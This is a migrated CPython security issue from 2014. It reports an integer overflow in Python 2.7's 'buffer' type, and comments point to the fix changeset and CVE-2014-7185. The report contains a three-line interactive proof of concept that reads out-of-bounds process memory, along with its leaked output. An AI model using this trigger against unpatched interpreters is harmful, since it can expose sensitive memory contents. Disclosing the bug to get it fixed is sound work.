Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

integer overflow in 'buffer' type allows reading memory #66030

Closed
benjaminp opened this issue Jun 24, 2014 · 4 comments
Closed

integer overflow in 'buffer' type allows reading memory #66030

benjaminp opened this issue Jun 24, 2014 · 4 comments
Labels
interpreter-core (Objects, Python, Grammar, and Parser dirs) release-blocker type-security A security issue

Comments

@benjaminp
Copy link
Contributor

BPO 21831
Nosy @benjaminp

Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.

Show more details

GitHub fields:

assignee = None
closed_at = <Date 2014-06-24.03:13:54.542>
created_at = <Date 2014-06-24.03:11:23.658>
labels = ['type-security', 'interpreter-core', 'release-blocker']
title = "integer overflow in 'buffer' type allows reading memory"
updated_at = <Date 2014-10-03.17:09:10.599>
user = 'https://github.com/benjaminp'

bugs.python.org fields:

activity = <Date 2014-10-03.17:09:10.599>
actor = 'python-dev'
assignee = 'none'
closed = True
closed_date = <Date 2014-06-24.03:13:54.542>
closer = 'python-dev'
components = ['Interpreter Core']
creation = <Date 2014-06-24.03:11:23.658>
creator = 'benjamin.peterson'
dependencies = []
files = []
hgrepos = []
issue_num = 21831
keywords = []
message_count = 4.0
messages = ['221392', '221393', '227578', '228341']
nosy_count = 4.0
nosy_names = ['benjamin.peterson', 'Arfrever', 'Henri.Salo', 'python-dev']
pr_nums = []
priority = 'release blocker'
resolution = 'fixed'
stage = 'resolved'
status = 'closed'
superseder = None
type = 'security'
url = 'https://bugs.python.org/issue21831'
versions = ['Python 2.7']
@benjaminp
Copy link
Contributor Author

Reported by Chris Foster on the security list:

$ ./python 
Python 2.7.7+ (2.7:8e0b7393e921, Jun 24 2014, 03:01:40) 
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = bytearray('hola mundo')
>>> b = buffer(a, 0x7fffffff, 0x7fffffff)
>>> print repr(b[:0x100])
"\x00\x08\x11\x00\x00\x00\x00\x00\x00\x00\xa00_\xf7\x10\x00\x00\x00i\x03\x00\x00\x02\x00\x00\x00\xa0\xd1\x18\x08I\x03\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00Directory tree walk with callback function.\n\n    For each directory in the directory tree rooted at top (including top\n    itself, but excluding '.' and '..'), call func(arg, dirname, fnames).\n    dirname is the na"

@benjaminp benjaminp added release-blocker interpreter-core (Objects, Python, Grammar, and Parser dirs) type-security A security issue labels Jun 24, 2014
@python-dev
Copy link
Mannequin

python-dev mannequin commented Jun 24, 2014

New changeset 8d963c7db507 by Benjamin Peterson in branch '2.7':
avoid overflow with large buffer sizes and/or offsets (closes bpo-21831)
http://hg.python.org/cpython/rev/8d963c7db507

@python-dev python-dev mannequin closed this as completed Jun 24, 2014
@HenriSalo
Copy link
Mannequin

HenriSalo mannequin commented Sep 25, 2014

CVE-2014-7185

@python-dev
Copy link
Mannequin

python-dev mannequin commented Oct 3, 2014

New changeset 5ef28c22dc24 by doko in branch '2.7':

@ezio-melotti ezio-melotti transferred this issue from another repository Apr 10, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
interpreter-core (Objects, Python, Grammar, and Parser dirs) release-blocker type-security A security issue
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@benjaminp